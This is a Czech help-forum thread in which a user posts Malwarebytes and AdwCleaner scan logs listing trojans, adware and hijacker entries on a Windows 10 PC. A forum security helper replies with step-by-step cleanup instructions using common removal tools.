Výsledek: Dokončeno
Skenované objekty: 423590
Uplynulý čas: 5 min, 57 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 14
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 1
Trojan.Boaxxe.Gen, HKU\S-1-5-21-2417313614-488722605-2671369154-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|EJCZTION, Žádná uživatelská akce, [18446], [262116],1.0.1509
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 1
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS, Žádná uživatelská akce, [2399], [380104],1.0.1509
Soubor: 6
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS\FF.HP, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\ff.NT, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\snp.sc, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\AGENT.DAT, Žádná uživatelská akce, [2399], [360491],1.0.1509
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
# Aktualizováno dne 28/02/2017 z Malwarebytes
# Databáze : 2017-03-15.2 [Server]
# Operační systém : Windows 10 Home (X64)
# Uživatelské jméno : Nekut - DESKTOP-S3S217H
# Spuštěno z : C:\Users\Nekut\Desktop\AdwCleaner.exe
# Mod: Skenování
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
Služba nalezena: Plusdax
***** [ Složky ] *****
Složka nalezena: C:\Users\Nekut\AppData\Local\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Roaming\cpuminer
Složka nalezena: C:\Users\Nekut\AppData\Roaming\ppslog
Složka nalezena: C:\Program Files\NixSrv
Složka nalezena: C:\ProgramData\AVG Security Toolbar
Složka nalezena: C:\ProgramData\Uniblue
Složka nalezena: C:\ProgramData\Plusdaxs
Složka nalezena: C:\ProgramData\Plusdax
Složka nalezena: C:\Program Files (x86)\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_akaelkiagnbfcccfnmbimdbplecgbikh_0
***** [ Soubory ] *****
Soubor nalezen: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Installer.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Main.dat
***** [ DLL ] *****
Nebyly nalezeny žádné škodlivé DLL.
***** [ WMI ] *****
Nebyly nalezeny žádné škodlivé klíče.
***** [ Zástupci ] *****
Žádný infikovaný zástupce nenalezen.
***** [ Naplánované úlohy ] *****
Žádná nebezpečná úloha nenalezena.
***** [ Registry ] *****
Klíč nalezen: HKLM\SOFTWARE\6734ebd2-f889-45db-86ff-4cf01bad675d
Klíč nalezen: HKLM\SOFTWARE\7fb7766b-64b0-4740-b3e0-8facee1c2b95
Klíč nalezen: HKLM\SOFTWARE\d5c55897-9fd9-4ce5-9991-7aca12b6be56
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5E6A8DA1-5731-465B-B036-B9E16EF26CAC}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\GlobalUpdate
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\PPStream
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\INSTALLPATH\STATUS
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer
Klíč nalezen: HKCU\Software\GlobalUpdate
Klíč nalezen: HKCU\Software\PPStream
Klíč nalezen: HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: HKCU\Software\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\GlobalUpdate
Klíč nalezen: HKLM\SOFTWARE\SimpleFiles
Klíč nalezen: HKLM\SOFTWARE\SupDp
Klíč nalezen: HKLM\SOFTWARE\Uniblue
Klíč nalezen: HKLM\SOFTWARE\Uniblue\DriverScanner
Klíč nalezen: HKLM\SOFTWARE\SUPDP
Klíč nalezen: HKLM\SOFTWARE\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Klíč nalezen: [x64] HKCU\Software\GlobalUpdate
Klíč nalezen: [x64] HKCU\Software\PPStream
Klíč nalezen: [x64] HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: [x64] HKCU\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.inf
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingat
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.inf
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.i
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gpuminer]
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [vProt]
Klíč nalezen: HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
Klíč nalezen: [x64] HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
***** [ Internetové prohlížeče ] *****
Nebyly nalezeny žádné škodlivé položky prohlížeče Firefox.
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - hxxp://www.mystartsearch.com/webfavicon.ico
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - fcfenmboojpjinhpgggodefccipikbpd
*************************
C:\AdwCleaner\AdwCleaner[S0].txt - [10694 Bajty] - [15/03/2017 17:24:58]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [10768 Bajty] ##########
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 17:33
Logovací soubor: malware.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1509
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 423590
Uplynulý čas: 5 min, 57 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 14
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 1
Trojan.Boaxxe.Gen, HKU\S-1-5-21-2417313614-488722605-2671369154-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|EJCZTION, Žádná uživatelská akce, [18446], [262116],1.0.1509
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 1
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS, Žádná uživatelská akce, [2399], [380104],1.0.1509
Soubor: 6
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS\FF.HP, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\ff.NT, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\snp.sc, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\AGENT.DAT, Žádná uživatelská akce, [2399], [360491],1.0.1509
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
jaro3 (member of the Security team)
Re: Please check my log
Run AdwCleaner again (on Windows Vista or Windows 7, right-click AdwCleaner and choose "Run as administrator").
Click "Scan"; when the scan finishes, click "Clean".
The program will perform the repair. After the automatic restart, click "Log Manager", then double-click the corresponding log (C:\AdwCleaner [C?].txt) and paste its entire contents here.
Download Junkware Removal Tool by Thisisu
http://www.bleepingcomputer.com/downloa ... oval-tool/
to your desktop.
Disable your antivirus program. Right-click JRT.exe and choose "Run as administrator". You will be prompted to press any key to continue. Press one.
The program will start scanning. The scan may take a long time, depending on the number of infections. When the scan finishes, a log (JRT.txt) will appear and be saved to the desktop.
Please copy its entire contents here.
- Run Malwarebytes' Anti-Malware again and choose "Scan Now" ("Skenovat nyní").
- When the program finishes, a message will appear; click "Quarantine All (delete selected)" ("Vše do karantény (smazat vybrané)"), then "Export Log" ("Exportovat záznam") and choose "text file" ("textový soubor"). Give the file a name and save it somewhere. Copy the entire contents of that log here.
Sophos Virus Removal Tool is a handy software tool that may remove infections that your antivirus program does not detect.
Download it here from one of these links:
http://www.majorgeeks.com/mg/get/sophos ... ool,1.html
http://www.majorgeeks.com/mg/getmirror/ ... ool,1.html
http://www.majorgeeks.com/mg/getmirror/ ... ool,2.html
Viruses can slow down your computer or try to steal your data without you even knowing you have them. What you need is a quick and easy way to find them and get rid of them. If you already have an antivirus program installed on your computer, you can also install Sophos Virus Removal Tool, which identifies and cleans up remaining infections that your antivirus program may have missed.
To use Sophos Virus Removal Tool, double-click it and press the "Start scanning" button. Sophos Virus Removal Tool will then search for and remove any viruses it finds. A restart may be required.
Download RogueKiller by Adlice Software
32-bit:
http://www.adlice.com/download/roguekil ... HlwZT14ODY
64-bit:
http://www.adlice.com/download/roguekil ... HlwZT14NjQ
to your desktop.
- Close all other programs and browsers.
- On Vista and Windows 7, 8 and 10, run RogueKiller.exe as administrator; on XP, double-click it.
- Click "Start Scan". In the new window, change nothing and click "Start Scan" at the bottom.
- The program scans the PC's processes. After the scan, click "Open Report", then "Open TXT" in the window, and copy the entire contents of the log here.
If the program is blocked, try running it several times. If it still will not start and work, rename it to winlogon.exe.
- If the log is longer than 60,000 characters, split it and post it in several posts.
When working with HJT, ComboFix, MbAM, SDFix and similar tools, close all other applications and browsers!
Do not send logs in private messages. While I am away, memphisto, Žbeky and Orcus stand in for me.
If you are satisfied, you can support our forum: Support the forum
Re: Please check my log
# AdwCleaner v6.044 - Log vytvořen 15/03/2017 v 17:51:07
# Aktualizováno dne 28/02/2017 z Malwarebytes
# Databáze : 2017-03-15.2 [Místní]
# Operační systém : Windows 10 Home (X64)
# Uživatelské jméno : Nekut - DESKTOP-S3S217H
# Spuštěno z : C:\Users\Nekut\Desktop\AdwCleaner.exe
# Mod: Čištění
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
[-] Služba smazána: Plusdax
***** [ Složky ] *****
[-] Složka smazána: C:\Users\Nekut\AppData\Local\globalUpdate
[-] Složka smazána: C:\Users\Nekut\AppData\Roaming\cpuminer
[-] Složka smazána: C:\Users\Nekut\AppData\Roaming\ppslog
[-] Složka smazána: C:\Program Files\NixSrv
[-] Složka smazána: C:\ProgramData\AVG Security Toolbar
[-] Složka smazána: C:\ProgramData\Uniblue
[-] Složka smazána: C:\ProgramData\Plusdaxs
[-] Složka smazána: C:\ProgramData\Plusdax
[-] Složka smazána: C:\Program Files (x86)\globalUpdate
[-] Složka smazána: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_akaelkiagnbfcccfnmbimdbplecgbikh_0
***** [ Soubory ] *****
[-] Soubor smazán: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
[-] Soubor smazán: C:\Users\Nekut\AppData\Roaming\Installer.dat
[-] Soubor smazán: C:\Users\Nekut\AppData\Roaming\Main.dat
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Zástupci ] *****
***** [ Naplánované úlohy ] *****
***** [ Registry ] *****
[-] Klíč smazán: HKLM\SOFTWARE\6734ebd2-f889-45db-86ff-4cf01bad675d
[-] Klíč smazán: HKLM\SOFTWARE\7fb7766b-64b0-4740-b3e0-8facee1c2b95
[-] Klíč smazán: HKLM\SOFTWARE\d5c55897-9fd9-4ce5-9991-7aca12b6be56
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
[-] Klíč smazán: HKLM\SOFTWARE\Classes\driverscanner
[-] Klíč smazán: HKLM\SOFTWARE\Classes\ppsmb
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\driverscanner
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\ppsmb
[-] Klíč smazán: HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
